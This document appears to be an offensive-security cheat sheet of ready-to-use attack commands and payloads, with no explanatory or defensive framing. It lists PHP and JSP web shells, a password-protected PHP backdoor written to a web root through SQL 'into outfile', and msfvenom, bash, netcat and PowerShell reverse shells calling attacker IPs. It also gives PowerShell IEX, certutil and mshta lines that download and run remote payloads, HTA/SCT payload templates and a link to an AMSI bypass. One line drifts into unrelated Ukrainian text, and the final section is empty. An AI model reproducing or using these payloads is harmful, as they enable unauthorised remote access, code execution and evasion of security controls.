#@ INTERACTIVE SHELL
1) python -c 'import pty; pty.spawn("/bin/bash")' 
2) echo os.system('/bin/bash')
-------------------------------------------------------------------------------------------------------------------------------------------------------------
#@ WEB PHP
1) <?php echo shell_exec( > $_GET['cmd']);?>
2) <?php system($_GET['cmd']); ?>

WEB PHP REVERSE SHELL => <?php echo shell_exec('bash -i >& /dev/tcp/10.11.0.106/443 0>&1');?>

<?php if (md5($_GET['password']) ==‘4fe7aa8a3013d07e292e5218c3db4944') { system($_GET['cmd']); } ?>
select "<?php if (md5($_GET['password']) == '4fe7aa8a3013d07e292e5218c3db4944') { system($_GET['cmd']); } ?>" into outfile "c:/xampp/htdocs/xampp/xampp.php";

Another useful PHP methods: system, shell_exec, passthru = <?php passthru($_GET['cmd']);?>, backtrick operator ``, popen, exec, pcntl_exec, proc_open

PHP BACKDOOR: https://github.com/b374k/b374k
-------------------------------------------------------------------------------------------------------------------------------------------------------------
## JAVA WEB SHELL

<% if (request.getParameter("cmd") != null) {
out.println("Output: " + request.getParameter("cmd") + "<br />");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr); disr = dis.readLine();
} } %>
-------------------------------------------------------------------------------------------------------------------------------------------------------------
## MSFVENOM PAYLOADS (WINDOWS)
        msfvenom -p windows/x64/shell_reverse_tcp LHOST=[attacker ip] LPORT=53 -f exe -o reverse.exe
        msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f msi -o reverse.msi
        
        msfvenom -p windows/meterpreter/reverse_tcp LHOS=10.10.0.53 LPORT=4444 -f exe -o rev.exe
-------------------------------------------------------------------------------------------------------------------------------------------------------------
## BASH REVERSE SHELL
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f
-------------------------------------------------------------------------------------------------------------------------------------------------------------
## POWERSHELL REVERSE SHELLS (https://podalirius.net/en/articles/windows-reverse-shells-cheatsheet/)
1) $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
2) powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
3) powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
4) powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')
5) iex (iwr -usebasicparsing http://attacker-host/payload.ps1)
-------------------------------------------------------------------------------------------------------------------------------------------------------------
## WINDOWS NETCAT: nc.exe -e cmd.exe <Attacker_IP> <PORT>
-------------------------------------------------------------------------------------------------------------------------------------------------------------
## WINDOWS CERTUTIL: certutil.exe -urlcache -split -f http://127.0.0.1:4444/beacon.exe C:\Windows\Temp\beacon.exe & C:\Windows\Temp\beacon.exe
-------------------------------------------------------------------------------------------------------------------------------------------------------------
## WINDOWS MSHTA: 
mshta.exe xост застосунку HTML Microsoft (R) – це виконуваний файл у Windows, розроблений корпорацією Майкрософт і постачається разом із операційною системою. 
Цей елемент є об’єктом запуску програми Microsoft HTML – програми, яка відповідає за роботу додатків HTML (.hta-файлів) та запуску скриптів у Windows.
1) mshta.exe vbscript:Close(Execute("GetObject(""script:http://127.0.0.1:4444/payload.sct"")"))
2) mshta.exe http://127.0.0.1:4444/payload.hta
3) mshta.exe \\127.0.0.1\folder\payload.hta
-------------------------------------------------------------------------------------------------------------------------------------------------------------
## WINDOWS SCT PAYLOAD:
<html>
  <head>
    <HTA:APPLICATION ID="HelloExample">
    <script language="jscript">
      new ActiveXObject('WScript.Shell').Run("cmd.exe /c calc.exe");
    </script>
  </head>
  <body>
    <script>self.close();</script>
  </body>
</html>

<?XML version="1.0"?>
<scriptlet>
  <public>
  </public>
  <script language="JScript">
    <![CDATA[var r = new ActiveXObject("WScript.Shell").Run("calc.exe");]]>
  </script>
</scriptlet>
-------------------------------------------------------------------------------------------------------------------------------------------------------------
## AMSI BYPASS POWERSHELL
https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
-------------------------------------------------------------------------------------------------------------------------------------------------------------
## POWERSHELL TO EXE

























